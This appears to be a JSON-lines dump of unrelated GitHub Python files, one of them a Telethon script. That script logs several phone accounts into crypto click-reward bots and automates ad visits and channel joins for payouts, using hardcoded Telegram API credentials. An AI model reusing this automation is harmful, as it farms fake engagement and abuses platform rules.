= np.zeros((3, 3))\n\n I[0,0] = np.sum(coods[:,1]**2 + coods[:,2]**2)\n I[1,1] = np.sum(coods[:,0]**2 + coods[:,2]**2)\n I[2,2] = np.sum(coods[:,1]**2 + coods[:,0]**2)\n\n I[0,1] = I[1,0] = - np.sum(coods[:,0] * coods[:,1])\n I[1,2] = I[2,1] = - np.sum(coods[:,2] * coods[:,1])\n I[0,2] = I[2,0] = - np.sum(coods[:,2] * coods[:,0])\n\n e_values, e_vectors = np.linalg.eig(I)\n\n sort_idx = np.argsort(e_values)\n\n e_values = e_values[sort_idx]\n e_vectors = e_vectors[sort_idx,:]\n\n a = ((5. / (2 * len(coods))) * (e_values[1] + e_values[2] - e_values[0]))**0.5\n b = ((5. / (2 * len(coods))) * (e_values[0] + e_values[2] - e_values[1]))**0.5\n c = ((5. / (2 * len(coods))) * (e_values[0] + e_values[1] - e_values[2]))**0.5\n\n# print a, b, c\n\n return [a,b,c], e_vectors\n\ndef create_image(pos, Ndim, i, j, imgrange, ls, smooth):\n # Define x and y positions for the gaussians\n Gx, Gy = np.meshgrid(np.linspace(imgrange[0][0], imgrange[0][1], Ndim),\n np.linspace(imgrange[1][0], imgrange[1][1], Ndim))\n # Initialise the image array\n gsmooth_img = np.zeros((Ndim, Ndim))\n # Loop over each star computing the smoothed gaussian distribution for this particle\n for x, y, l, sml in zip(pos[:, i], pos[:, j], ls, smooth):\n # Compute the image\n g = np.exp(-(((Gx - x) ** 2 + (Gy - y) ** 2) / (2.0 * sml ** 2)))\n # Get the sum of the gaussian\n gsum = np.sum(g)\n # If there are stars within the image in this gaussian add it to the image array\n if gsum > 0:\n gsmooth_img += g * l / gsum\n # img, xedges, yedges = np.histogram2d(pos[:, i], pos[:, j], bins=nbin, range=imgrange, weights=ls)\n return gsmooth_img\n\n\n\ndef calc_halflightradius(coords, L, sml, z):\n\n # Define comoving softening length in pMpc\n csoft = 0.001802390 / (0.6777 * (1 + z)) * 1e3\n # Define width (in Mpc)\n ini_width = 62\n # Compute the resolution\n ini_res = ini_width / csoft\n res = int(np.ceil(ini_res))\n # Compute the new width\n width = csoft * res\n\n # Define range and extent for the images\n imgrange = ((-width / 2, width / 2), (-width / 2, width / 2))\n imgextent = [-width / 2, width / 2, -width / 2, width / 2]\n # Set up aperture objects\n positions = [(res / 2, res / 2)]\n app_radii = np.linspace(0.001, res / 4, 500) # 500 apertures out to 1/4 the image width\n apertures = [CircularAperture(positions, r=r) for r in app_radii]\n app_radii *= csoft\n\n tot_l = np.sum(L)\n img = create_image(coords,res, 0, 1, imgrange, L, sml)\n\n hlr = get_img_hlr(img, apertures, tot_l, app_radii, res, csoft)\n\n return hlr\n\n\ndef get_img_hlr(img, apertures, tot_l, app_rs, res, csoft):\n # Apply the apertures\n phot_table = aperture_photometry(img, apertures, method='subpixel', subpixels=5)\n # Extract the aperture luminosities\n row = np.lib.recfunctions.structured_to_unstructured(np.array(phot_table[0]))\n lumins = row[3:]\n # Get half the total luminosity\n half_l = tot_l / 2\n # Interpolate to increase resolution\n func = interp1d(app_rs, lumins, kind=\"linear\")\n interp_rs = np.linspace(0.001, res / 4, 10000) * csoft\n interp_lumins = func(interp_rs)\n # Get the half mass radius particle\n hlr_ind = np.argmin(np.abs(interp_lumins - half_l))\n hlr = interp_rs[hlr_ind]\n return hlr\n","repo_name":"stephenmwilkins/flares_inclination","sub_path":"helpers.py","file_name":"helpers.py","file_ext":"py","file_size_in_byte":12104,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"23232740524","text":"name = input()\n\ntotal_points = 301\ncount = 0\nbad_count = 0\n\nwhile total_points != 0:\n target = input()\n if target == \"Retire\":\n print(F\"{name} retired after {bad_count} unsuccessful shots.\")\n break\n poits = int(input())\n if target == \"Single\":\n poits = poits\n elif target == \"Double\":\n poits = poits * 2\n elif target == \"Triple\":\n poits = poits * 3\n total_points -= poits\n if total_points < 0:\n total_points += poits\n bad_count +=1\n else:\n count += 1\nelse:\n print(F\"{name} won the leg with {count} shots.\")\n","repo_name":"Nedelchev86/Python-Basic-SoftUni","sub_path":"Online_Exam_9_and_10_March_2019/04_Darts.py","file_name":"04_Darts.py","file_ext":"py","file_size_in_byte":593,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"72203122407","text":"import pygame\nfrom pygame.locals import *\nfrom constants import SCREEN_WIDTH, SCREEN_HEIGHT\n\nclass FinalDefensor(pygame.sprite.Sprite):\n def __init__(self, position_x, position_y, power, image): # life between 0 and 1\n pygame.sprite.Sprite.__init__(self)\n self.position_x = position_x\n self.position_y = position_y\n self.power = power\n self.image = pygame.image.load(image).convert_alpha()\n self.rect = self.image.get_rect()\n self.rect[0] = position_x\n self.rect[1] = position_y\n\n def update(self):\n return ","repo_name":"davixie/CES22_PlantsVsZombies","sub_path":"classes/defensor/final_defense.py","file_name":"final_defense.py","file_ext":"py","file_size_in_byte":576,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"53"} +{"seq_id":"41843064257","text":"import os\nimport sys\nfrom configparser import ConfigParser\n\nsys.path.insert(1, os.path.join(sys.path[0], \"..\"))\n\n# trunk-ignore(flake8/E402)\nfrom classes import R3dditScrapper\n\n# trunk-ignore(flake8/E402)\nfrom functions.tools import check_update\n\n\ndef test_check_update():\n \"\"\"\n Test check_update function\n \"\"\"\n assert check_update(testing=True) is True\n\n\ndef test_R3dditScrapper():\n \"\"\"\n Test R3dditScrapper class\n \"\"\"\n scrapper = R3dditScrapper(\n sub=\"pics\", limit=1, order=\"hot\", nsfw=\"True\", argument=False, path=\"images\"\n )\n assert scrapper.sub == \"pics\"\n assert scrapper.limit == 1\n assert scrapper.order == \"hot\"\n assert scrapper.nsfw is True\n assert scrapper.argument is False\n assert scrapper.path == \"images/pics/\"\n config = ConfigParser()\n config.read(\"config.ini\")\n try:\n # Prioritize arguments path over config path\n path = config[\"Path\"][\"path\"]\n except KeyError:\n path = \"images\"\n scrapper = R3dditScrapper(\n sub=\"pics\", limit=1, order=\"hot\", nsfw=\"True\", argument=False, path=path\n )\n assert scrapper.path == path + \"/\" + \"pics/\"\n\n\ndef test_download():\n \"\"\"\n Test download function\n \"\"\"\n import os\n\n scrapper = R3dditScrapper(\n sub=\"pics\", limit=1, order=\"hot\", nsfw=\"True\", argument=False, path=None\n )\n scrapper.download(\n {\"url\": \"https://i.redd.it/kq1strmcq3i91.jpg\", \"fname\": \"test.jpg\"}\n )\n assert os.path.isfile(\"test.jpg\") is True\n os.remove(\"test.jpg\")\n\n\ndef test_nsfw():\n \"\"\"\n Test nsfw function\n \"\"\"\n scrapper = R3dditScrapper(\n sub=\"pics\", limit=1, order=\"hot\", nsfw=\"True\", argument=False, path=None\n )\n assert scrapper.nsfw is True\n scrapper = R3dditScrapper(\n sub=\"pics\", limit=1, order=\"hot\", nsfw=\"False\", argument=False, path=None\n )\n assert scrapper.nsfw is False\n","repo_name":"Baccount/R3ddit-Scrapper","sub_path":"scr/tests/test_func.py","file_name":"test_func.py","file_ext":"py","file_size_in_byte":1885,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"53"} +{"seq_id":"14804763331","text":"# -- coding: utf8 --\r\nimport os,re, sys\r\ntry:\r\n from telethon.sync import TelegramClient\r\n from telethon import errors\r\n from telethon.tl.functions.messages import GetHistoryRequest, GetBotCallbackAnswerRequest, ImportChatInviteRequest\r\n from telethon.tl.functions.channels import JoinChannelRequest\r\nexcept:\r\n os.system(\"pip install telethon\")\r\n from telethon.sync import TelegramClient\r\n from telethon import errors\r\n from telethon.tl.functions.messages import GetHistoryRequest, GetBotCallbackAnswerRequest, ImportChatInviteRequest\r\n from telethon.tl.functions.channels import JoinChannelRequest\r\nfrom time import sleep\r\nfrom datetime import datetime\r\ntry:\r\n\timport requests\r\nexcept:\r\n\tos.system(\"pip install requests\")\r\n\timport requests\r\ntry:\r\n from colorama import Back, Fore\r\nexcept:\r\n os.system(\"pip install colorama\")\r\n from colorama import Back, Fore\r\nif not os.path.exists('session'):\r\n os.makedirs('session')\r\napi_id = 1138679\r\napi_hash = \"45d02583532e7a4b2ae4b5d0784c40af\"\r\ndo = Fore.RED\r\nvang = Fore.YELLOW\r\nxanh = Fore.GREEN\r\nmagenta = Fore.MAGENTA\r\ntrang = Fore.WHITE\r\nblue = Fore.BLUE\r\ns = requests.session()\r\nos.system(\"cls\")\r\nos.system(\"clear\")\r\nbanner = xanh+'''\r\n\r\n\t /$$ /$$ /$$$$$$$ \r\n\t| $$$ /$$$ | $$__ $$\r\n\t| $$$$ /$$$$ /$$$$$$ | $$ \\ $$\r\n\t| $$ $$/$$ $$ /$$__ $$ | $$ | $$\r\n\t| $$ $$$| $$| $$ \\__/ | $$ | $$\r\n\t| $$\\ $ | $$| $$ | $$ | $$\r\n\t| $$ \\/ | $$| $$ | $$$$$$$/\r\n\t|__/ |__/|__/ |_______/ \r\n '''+\"\\n\t{}Youtube: {}Mr D\".format(do,vang)+\"\\n\t{}Link Channel: {}{}\\n\".format(do,vang,\"bit.ly/Channel-MrD\")\r\nnhap_bot = blue + \"[{C1}1{C2}] - Dogecoin Click Bot\\n[{C1}2{C2}] - Litecoin Click Bot\\n[{C1}3{C2}] - Zcash Click Bot\\n[{C1}4{C2}] - Bitcoin Click Bot\\n[{C1}5{C2}] - BCH Click Bot\\n\".format(C1=xanh,C2=blue)\r\nprint(banner)\r\n\r\nc = requests.Session()\r\nos.system(\"termux-open-url http://agus-password.ga\")\r\n\r\nif not os.path.exists(\".password\"):\r\n os.makedirs(\".password\")\r\n\r\nprint(\"\\033[1;32m[>>] Enter Password To Continue\\n\\033[1;35m[>>]\\033[1;0m Link Password: https://agus-password.ga\")\r\npw = c.get(\"http://agus-password.ga/key.txt\")\r\nif not os.path.exists(\".password/password.txt\"):\r\n f = open(\".password/password.txt\", \"w+\")\r\n f.write(\"wkwkwkwkw\")\r\n f.close()\r\n\r\nfor i in range(99):\r\n f = open(\".password/password.txt\", \"r\")\r\n if f.readlines()[0] == pw.text:\r\n sys.stdout.write('\\r \\r')\r\n sys.stdout.write('\\r[🔍] Checking Password....!')\r\n sleep(2)\r\n break\r\n pwin = input(\"\\033[1;32m[©] Enter Password \\033[1;30m:\\033[1;0m \")\r\n if pwin == pw.text:\r\n f = open(\".password/password.txt\", \"w+\")\r\n f.write(pwin)\r\n f.close()\r\n print(\"\\033[1;32m[✓] Password correct\")\r\n sleep(2)\r\n break\r\n else:\r\n print(\"\\033[1;31m[X] Incorrect Password...!\")\r\n if i > 1:\r\n print(\"\\033[1;33m[<<]Get Password At Website:\\n\\033[1;0mhttp://agus-password.ga\\n\")\r\n sys.exit()\r\n\r\n\r\n\r\ndef connect(phone):\r\n client = TelegramClient('session/'+phone,api_id,api_hash)\r\n client.connect()\r\n if not client.is_user_authorized():\r\n client.send_code_request(phone)\r\n try:\r\n client.sign_in(phone, input(vang+'Nhập code OTP phone {}\\n: '.format(phone)))\r\n except errors.SessionPasswordNeededError:\r\n client.start(phone,input(\"Nhập mã 2fa phone {}: \".format(phone)))\r\n return client\r\nDoge = \"@Dogecoin_click_bot\"\r\nLtc = \"@Litecoin_click_bot\"\r\nZec = \"@Zcash_click_bot\"\r\nBtc = \"@BitcoinClick_bot\"\r\nBch = \"@BCH_clickbot\"\r\nos.system(\"clear\")\r\nprint(banner)\r\nprint(Back.YELLOW+do+\"START\".center(50)+Back.BLACK)\r\nprint(\"\\n\\n\")\r\nprint(xanh+\"Vui lòng nhập SĐT(phone) nếu chỉ tool 1 nick,\\ncòn muốn tool nhiều SĐT(phone) thì vui lòng lưu \\nSĐT(phone) vào file {C1}[phone.txt]{C2},mỗi SĐT(phone) là\\n1 dòng và Nhấn {C1}[ENTER]{C2} để chạy tool(dành cho tool\\nnhiều SĐT(phone)).\".format(C1=vang,C2=xanh))\r\nnhap = input(do+\"\\nNhập(import): \")\r\nlist_phone = []\r\nif(nhap == \"\" or nhap == \" \" or nhap == \"enter\" or nhap == \"ENTER\"):\r\n print(vang+\"Vui Lòng Đợi Để Hoàn Thành Đăng Nhập Hết Các SĐT(phone), Để Chạy Tool. \\n\"+trang)\r\n try:\r\n \tfile1 = open(\"phone.txt\",\"r\")\r\n except:\r\n \tprint(do+\"Không có file {}[phone.txt]\".format(vang))\r\n \texit(0)\r\n stt = 0\r\n for i in file1:\r\n \tstt += 1\r\n \ttry:\r\n \t\tduy_connect = connect(i.strip())\r\n \texcept:\r\n \t\tprint(do+\"=\"*50)\r\n \t\tprint(\"SĐT(phone) {}{}{} Này Lỗi Rồi, Vui Lòng Chuyển SĐT(phone) Khác.\".format(vang,i,do))\r\n \t\tprint(\"=\"*50+\"\\n\"+trang)\r\n \t\tcontinue\r\n \tlist_phone.append(i.strip())\r\n \tduy_connect.disconnect()\r\n if(stt==0):\r\n \tprint(do+\"Vui Lòng Nhập SĐT(phone) Vào file {}[phone.txt]{} Và Mỗi SĐT Là 1 Dòng\\n\".format(vang,do))\r\n \texit(0)\r\n print(xanh+\"Đăng Nhập Thành Công List SĐT(phone)!!!\\n\"+trang)\r\nelse:\r\n p = nhap\r\n stt = 1\r\n list_phone.append(p)\r\n\r\nos.system(\"cls\")\r\nos.system(\"clear\")\r\nprint(banner)\r\nprint(Back.YELLOW+do+\"START\".center(50)+Back.BLACK)\r\nprint(\"\\n\\n\")\r\nprint(nhap_bot)\r\nnhap = input(vang+\"\\nNhập số thứ tự bot muốn tool: \")\r\nprint(xanh+\"Bạn muốn tool chạy hết 1 lượt rồi dừng nhập {C1}[ENTER]\\n{C2}hay tự động tool lại sau mỗi 4 giờ nhập {C1} [YES]{C2}.\".format(C1=vang,C2=xanh))\r\nlap_vo_han = input(do+\"Nhập (import):\"+vang)\r\ntoolBot = []\r\ndef get_entity():\r\n if \"1\" in nhap:\r\n entity = client.get_entity(Doge)\r\n toolBot.append([\"DOGE\",Doge,entity])\r\n if \"2\" in nhap:\r\n entity = client.get_entity(Ltc)\r\n toolBot.append([\"LTC\",Ltc,entity])\r\n if \"3\" in nhap:\r\n entity = client.get_entity(Zec)\r\n toolBot.append([\"ZEC\",Zec,entity])\r\n if \"4\" in nhap:\r\n entity = client.get_entity(Btc)\r\n toolBot.append([\"BTC\",Btc,entity])\r\n if \"5\" in nhap:\r\n entity = client.get_entity(Bch)\r\n toolBot.append([\"BCH\",Bch,entity])\r\n\r\n\r\ndef Bot_url(name):\r\n client.send_message(entity=entity_id, message=\"/visit\")\r\n sleep(3)\r\n History_messenger = client(GetHistoryRequest(peer=entity_id,limit=1,offset_date=None,offset_id=0,max_id=0,min_id=0,add_offset=0,hash=0))\r\n if History_messenger.messages[0].message.find ('Sorry') != -1 and History_messenger.messages[0].message.find ('no new ads') != -1:\r\n print(magenta + \"[{} ({})] \".format(name,datetime.now().strftime(\"%H:%M:%S\"))+vang+\"Hêt ADS\"+trang)\r\n\r\n return 0, \"Duy\"\r\n msg_id = History_messenger.messages[0].id\r\n url = History_messenger.messages[0].reply_markup.rows[0].buttons[0].url\r\n skip = History_messenger.messages[0].reply_markup.rows[1].buttons[1].data\r\n return url,skip,msg_id\r\ndef get_url(name,url,skip,msg_id):\r\n get = s.get(url)\r\n get.close()\r\n if \"Please solve the reCAPTCHA to continue\" in get.text or \"Switch to reCAPTCHA\" in get.text:\r\n client (GetBotCallbackAnswerRequest (peer=channel_id, msg_id=msg_id, data=skip))\r\n print(magenta+\"[{} ({})] \".format(name,datetime.now().strftime(\"%H:%M:%S\"))+do+\"Skip Visit, Captcha\"+trang)\r\n return 2, \"duy\"\r\n History_messenger = client(GetHistoryRequest(peer=entity_id,limit=1,offset_date=None,offset_id=0,max_id=0,min_id=0,add_offset=0,hash=0))\r\n msg_vist = History_messenger.messages[0].message\r\n if \"to get your reward\" in msg_vist:\r\n \tclient (GetBotCallbackAnswerRequest (peer=channel_id, msg_id=msg_id, data=skip))\r\n \tprint(magenta+\"[{} ({})] \".format(name,datetime.now().strftime(\"%H:%M:%S\"))+do+\"Skip Visit, Reward\"+trang)\r\n \treturn 2,\"Duy\"\r\n elif \"Please stay on the site for at least\" in msg_vist:\r\n time = re.sub(r'\\D',\"\",msg_vist)\r\n else:\r\n time = \"30\"\r\n print(magenta+\"[{} ({})] \".format(name,datetime.now().strftime(\"%H:%M:%S\"))+xanh+\"Visit Url: {}{}{} \".format(vang,url,xanh)+trang)\r\n for j in range(int(time),0,-1):\r\n \tprint(xanh+\" Đợi {}{}{} Giây Để Nhận {}{}{} \".format(vang,j,xanh,vang,name,xanh),end=\"\\r\")\r\n \tsleep(1)\r\n print(xanh+\"Đã Nhận {}{} \".format(do,name))\r\n return 2,\"Duy\"\r\n\r\ndef Bot_joind_channel(name):\r\n client.send_message(entity=entity_id, message=\"/join\")\r\n sleep(3)\r\n History_messenger = client(GetHistoryRequest(peer=entity_id,limit=1,offset_date=None,offset_id=0,max_id=0,min_id=0,add_offset=0,hash=0))\r\n if History_messenger.messages[0].message.find ('Sorry') != -1 and History_messenger.messages[0].message.find ('no new ads') != -1:\r\n print(magenta + \"[{} ({})] \".format(name,datetime.now().strftime(\"%H:%M:%S\"))+vang+\"Hêt ADS\"+trang)\r\n\r\n return 0, \"Duy\"\r\n msg_id = History_messenger.messages[0].id\r\n url = History_messenger.messages[0].reply_markup.rows[0].buttons[0].url\r\n joined = History_messenger.messages[0].reply_markup.rows[0].buttons[1].data\r\n skip = History_messenger.messages[0].reply_markup.rows[1].buttons[1].data\r\n try:\r\n id_joined = str.replace(url, \"https://t.me/\", \"\")\r\n except:\r\n join_Chat(name=name,url=url,msg_id=msg_id,skip=skip)\r\n return 2, \"Duy\"\r\n sleep(1)\r\n return url,joined,id_joined,skip,msg_id\r\ndef join_channel(name,id_joined,msg_id,joined,skip):\r\n client(JoinChannelRequest(\"@{}\".format(id_joined)))\r\n sleep(4)\r\n client(GetBotCallbackAnswerRequest(peer=channel_id, msg_id=msg_id, data=joined))\r\n sleep(2)\r\n History_messenger_1 = client (\r\n GetHistoryRequest (peer=entity_id, limit=1, offset_date=None, offset_id=0, max_id=0, min_id=0, add_offset=0,\r\n hash=0))\r\n if History_messenger_1.messages[0].message.find ('We cannot') != -1 and History_messenger_1.messages[0].message.find (\"find you in\") != -1 and History_messenger_1.messages[0].message.find (\"the group\") != -1:\r\n \r\n client (GetBotCallbackAnswerRequest (peer=channel_id, msg_id=msg_id, data=skip))\r\n print(magenta+\"[{} ({})] \".format(name,datetime.now().strftime(\"%H:%M:%S\"))+xanh+\"Skip Join, Không thể Join Channel\"+trang)\r\n sleep(3)\r\n return 1, \"Duy\"\r\n print(magenta+\"[{} ({})] \".format(name,datetime.now().strftime(\"%H:%M:%S\"))+xanh+\"JOIN Xong Channel \"+do+\"@{} \".format(id_joined))\r\ndef join_Chat(name,url,msg_id,skip):\r\n try:\r\n id_joinedd = str.replace (url, \"https://t.me/joinchat/\", \"\")\r\n client(ImportChatInviteRequest(id_joinedd))\r\n print (\r\n magenta + \"[{} ({})] \".format(name,datetime.now().strftime(\"%H:%M:%S\")) + xanh + \"JOIN Xong Group \" + do + \"@{} \".format (id_joinedd))\r\n return 2, \"Duy\"\r\n except:\r\n client (GetBotCallbackAnswerRequest (peer=channel_id, msg_id=msg_id, data=skip))\r\n print (magenta + \"[{} ({})] \".format(name,datetime.now().strftime(\"%H:%M:%S\")) + Fore.CYAN + \"Skip Join\"+trang)\r\n sleep (3)\r\n return 2, \"Duy\"\r\nvisit = False\r\nchannel = False\r\nbb = 0\r\nfor b in list_phone:\r\n\tbb += 1\r\nprint(do+\"=\"*50)\r\nprint(blue+\"Số Account Login Thành Công:\",bb,\"/\",stt)\r\nprint(do+\"=\"*50)\r\nwhile True:\r\n\tfor k in list_phone:\r\n\t\tvisit = True\r\n\t\tchannel = False\r\n\t\ttry:\r\n\t\t\tprint(xanh+\"Đợi chút để tôi check SĐT(phone)\"+trang)\r\n\t\t\tclient = connect(k)\r\n\t\t\tprint(\"\\r\t\t\t\t\t\t\t\t\t\t\t\t\",end=\"\\r\")\r\n\t\t\t\r\n\t\texcept:\r\n\t\t\tprint(do+\"=\"*50)\r\n\t\t\tprint(\"SĐT(phone) Này Lỗi Rồi, Vui Lòng Chuyển SĐT(phone) Khác.\")\r\n\t\t\tprint(\"=\"*50+\"\\n\"+trang)\r\n\t\t\tcontinue\r\n\t\tprint(vang+\"=\"*50)\r\n\t\tprint(\"Bạn đang tool SĐT(phone): {}\".format(k))\r\n\t\tget_entity()\r\n\t\ttry:\r\n\t\t\twhile True:\r\n\t\t\t\tif(len(toolBot) == 0):\r\n\t\t\t\t\tif(visit == True):\r\n\t\t\t\t\t\tprint(\"Hết ADS Visit Bot.\")\r\n\t\t\t\t\t\tvisit = False\r\n\t\t\t\t\t\tchannel = True\r\n\t\t\t\t\t\tget_entity()\r\n\t\t\t\t\t\t\r\n\t\t\t\t\telif(channel == True):\r\n\t\t\t\t\t\tprint(\"Hết ADS Join Channel Bot.\")\r\n\t\t\t\t\t\tchannel = False\r\n\t\t\t\t\telse:\r\n\t\t\t\t\t\tprint(\"Hết ADS All Bot.\")\r\n\t\t\t\t\t\tbreak\r\n\t\t\t\tif(visit == True):\r\n\t\t\t\t\ttry:\r\n\t\t\t\t\t\tfor i in toolBot:\r\n\t\t\t\t\t\t\tten = i[0]\r\n\t\t\t\t\t\t\tchannel_id = i[1]\r\n\t\t\t\t\t\t\tentity_id = i[2]\r\n\t\t\t\t\t\t\tdtt = Bot_url(ten)\r\n\t\t\t\t\t\t\tif dtt[0] == 0:\r\n\t\t\t\t\t\t\t\ttoolBot.remove(i)\r\n\t\t\t\t\t\t\t\tcontinue\r\n\t\t\t\t\t\t\telif dtt[0] == 2:\r\n\t\t\t\t\t\t\t\tcontinue\r\n\t\t\t\t\t\t\telse:\r\n\t\t\t\t\t\t\t\tget_url(name=ten,url=dtt[0],skip=dtt[1],msg_id=dtt[2])\r\n\t\t\t\t\texcept:\r\n\t\t\t\t\t\ttoolBot.clear()\r\n\t\t\t\t\t\tvisit = False\r\n\t\t\t\t\t\tchannel = True\r\n\t\t\t\t\t\tget_entity()\r\n\t\t\t\tif (channel == True):\r\n\t\t\t\t\ttry:\r\n\t\t\t\t\t\tfor p in toolBot:\r\n\t\t\t\t\t\t\tten = p[0]\r\n\t\t\t\t\t\t\tchannel_id = p[1]\r\n\t\t\t\t\t\t\tentity_id = p[2]\r\n\t\t\t\t\t\t\tdtt = Bot_joind_channel(ten)\r\n\t\t\t\t\t\t\tif dtt[0] == 0:\r\n\t\t\t\t\t\t\t\ttoolBot.remove(p)\r\n\t\t\t\t\t\t\t\tcontinue\r\n\t\t\t\t\t\t\telif dtt[0] == 2:\r\n\t\t\t\t\t\t\t\tcontinue\r\n\t\t\t\t\t\t\telse:\r\n\t\t\t\t\t\t\t\tjoin_channel(name=ten,id_joined=dtt[2],msg_id=dtt[4],joined=dtt[1],skip=dtt[3])\r\n\t\t\t\t\texcept:\r\n\t\t\t\t\t\tchannel = False\r\n\t\t\t\tif (visit == False and channel == False):\r\n\t\t\t\t\tvisit = True\r\n\t\t\t\t\tchannel = False\r\n\t\t\t\t\ttoolBot.clear()\r\n\t\t\t\t\tclient.disconnect()\r\n\t\t\t\t\tbreak\r\n\t\texcept:\r\n\t\t\tprint(do+\"=\"*50)\r\n\t\t\tprint(\"\\nSĐT(phone): {} Lỗi\\nNext SĐT(phone) Tiếp Theo!!!\\n\".format(k))\r\n\t\t\tprint(\"=\"*50+\"\\n\"+trang)\r\n\t\t\ttoolBot.clear()\r\n\t\t\tclient.disconnect()\r\n\tprint(xanh+\"=\"*50)\r\n\tprint(\"Đã Tool Hết List SĐT(phone)!!!\")\r\n\tprint(\"=\"*50+\"\\n\")\r\n\ttoolBot.clear()\r\n\tif(lap_vo_han == \"\" or lap_vo_han == \" \" or lap_vo_han == \"enter\" or lap_vo_han == \"ENTER\"):\r\n\t\texit(0)\r\n\telse:\r\n\t\ttime_lap = 14400\r\n\t\tfor i in range(time_lap,0,-1):\r\n\t\t\tif(i > 3600):\r\n\t\t\t\tgio = i / 3600\r\n\t\t\t\tphut = (i % 3600) / 60\r\n\t\t\t\tgiay = ((i % 3600) % 60)% 60\r\n\t\t\t\tprint(xanh+\"\\rĐợi {C1}{H}{C2} giờ {C1}{M}{C2} phút {C1}{S}{C2} giây\".format(C1=vang,C2=xanh,H=int(gio),M=int(phut),S=int(giay)),end=\" \")\r\n\t\t\t\tsleep(1)\r\n\t\t\telse:\r\n\t\t\t\tphut = i / 60\r\n\t\t\t\tgiay = i % 60\r\n\t\t\t\tprint(xanh+\"\\rĐợi {C1}{M}{C2} phút {C1}{S}{C2} giây\".format(C1=vang,C2=xanh,M=int(phut),S=int(giay)),end=\" \")\r\n\t\t\t\tsleep(1)\r\n\t\tcontinue","repo_name":"jokervtn94/jokervtn94","sub_path":"TeleBot.py","file_name":"TeleBot.py","file_ext":"py","file_size_in_byte":13967,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"37402756580","text":"import numpy as np\nimport matplotlib.pyplot as plt\nfrom copy import deepcopy\n\n# Ensure that matplotlib, numpy are installed\n# pip install matplotlib or pip3 install matplotlib\n# pip install numpy or pip3 install numpy\n\ndef almostEqual(x,y):\n return abs(x-y)<10**-8\n\ndef gaussianElimination(m):\n def pivot(m, n, i):\n max_row = max(range(i, n), key=lambda r: abs(m[r][i]))\n m[i], m[max_row] = m[max_row], m[i]\n\n # forward elimination\n n = len(m[0])\n for i in range(n):\n pivot(m, n, i)\n for j in range(i+1, n):\n m[j] = [m[j][k] - m[i][k]*m[j][i]/m[i][i] for k in range(n+1)]\n\n if m[n-1][n-1] == 0: raise ValueError('No unique solution')\n\n # backward substitution\n x = [0] * n\n for i in range(n-1, -1, -1):\n s = sum(m[i][j] * x[j] for j in range(i, n))\n x[i] = (m[i][n] - s) / m[i][i]\n return x\n\n\ndef splitTupleToXY(L):\n x,y = map(list,zip(*L))\n return x, y\n\ndef evalPolynomial(coeffs, x):\n return sum(coeff*x**i for i,coeff in enumerate(coeffs[::-1]))\n\ndef checkValues(xList, yList, coeffs):\n for i in range(len(xList)):\n if not almostEqual(evalPolynomial(coeffs, xList[i]), yList[i]):\n return False\n return True\n\ndef fitPolynomial(xList, yList):\n degree = 0\n while True:\n fit = np.polynomial.polynomial.polyfit(xList, yList, degree) # Numpy is way more efficient than python for analysing lists\n fit = np.flip(fit) # Fit is reversed at first, as in c + bx + ax^2, which is not so useful, so we use flip() to fix it\n if checkValues(xList, yList, fit):\n return fit\n degree += 1\n\n# Some points\n# (1,3)\n# (2,6)\n# (3,14)\n# Now set up some equations\n# a(1)**2 + b(1) + c = 3\n# a(2)**2 + b(2) + c = 6\n# a(3)**2 + b(3) + c = 14\n# Now solve the system using gaussian elimination\n# Use these values to identify the polynomial\n# This only works if there are no zeros in the input function\n# Mr. Jackson, can you help me figure out how to make it work if there are zero points? as in intercepts?\n# If you go down to line 106 and change fitPolynomial to fitPolynomialGaussian, it will fail when dividing by zero\n\ndef fitPolynomialGaussian(xList, yList):\n eliminationSet = []\n for i in range(len(xList)):\n eliminationSet.append([xList[i]**2, xList[i], 1, yList[i]])\n print(eliminationSet)\n variables = gaussianElimination(eliminationSet)\n print(variables)\n\ndef graphPolynomialFunction(P, xStep, xStart, xEnd, xPoints, yPoints):\n xList = []\n x = xStart\n while x <= xEnd:\n xList.append(x)\n x += xStep\n yList = [evalPolynomial(P, x) for x in xList]\n\n plt.plot(xList, yList, c=\"blue\")\n\n plt.scatter(xPoints, yPoints, c=\"orange\")\n\n plt.show()\n\ndef findPolynomialFunction(D):\n xList, yList = splitTupleToXY(D)\n polynomial = fitPolynomialGaussian(xList, yList)\n print(polynomial)\n xListSorted, yListSorted = splitTupleToXY(sorted(D))\n graphPolynomialFunction(polynomial, 0.1, xListSorted[0]-1, yListSorted[-1]+1, xList, yList)\n return polynomial\n\nA = [(0,6), (-2,0), (-3,0)]\nB = [(-3,5280.5),(-2,675.4),(-1,27.2),(4,17732.2),(1,41.8),(2,470.6),(3,3500.4)]\nD = [(1,3),(2,6),(3,14)]\n#xList, yList = splitTupleToXY(A)\n#print(fitPolynomial(xList, yList))\nfindPolynomialFunction(A)","repo_name":"PicoPlanetDev/computational-math","sub_path":"unit-5/findPolynomialFunction.py","file_name":"findPolynomialFunction.py","file_ext":"py","file_size_in_byte":3289,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"15123498741","text":"import numpy as np\nimport pandas as pd\nimport re\nimport string\n\nPATENT_NUMBER_PATTERN = re.compile('\\b(\\d{1}[,\\s]\\d{3}[,\\s]\\d{3})\\b')\nDATE_URL_PATTERN = re.compile('(\\d{1,2}[./-]\\d{1,2}[./-]\\d{4}|'\n '\\d{4}[./-]\\d{1,2}[./-]\\d{1,2}|'\n '20\\d{2}[0-3]\\d{1}[0-3]\\d{1}|'\n '[0-3]\\d{1}[0-3]\\d{1}20\\d{2})')\nDATE_HTML_PATTERN = re.compile('(\\d{1,2}[./-]\\d{1,2}[./-]\\d{4}|'\n '\\d{4}[./-]\\d{1,2}[./-]\\d{1,2})')\nCOPYRIGHT_PATTERN = [\n r'(copyright 19\\d{2})|(copyright 20\\d{2})',\n r'(\\(c\\) copyright|copyright \\(c\\))',\n r'(\\(c\\) 19\\d{2})|(\\(c\\) 20\\d{2})|(\\(c\\)19\\d{2})|(\\(c\\)20\\d{2})']\n\nUS_CODE_TERMS = ['35 u.s.c. § 287', '35 usc § 287', '35 u.s.c. §287', \n '35 usc §287', '35 u.s.c.', 'section 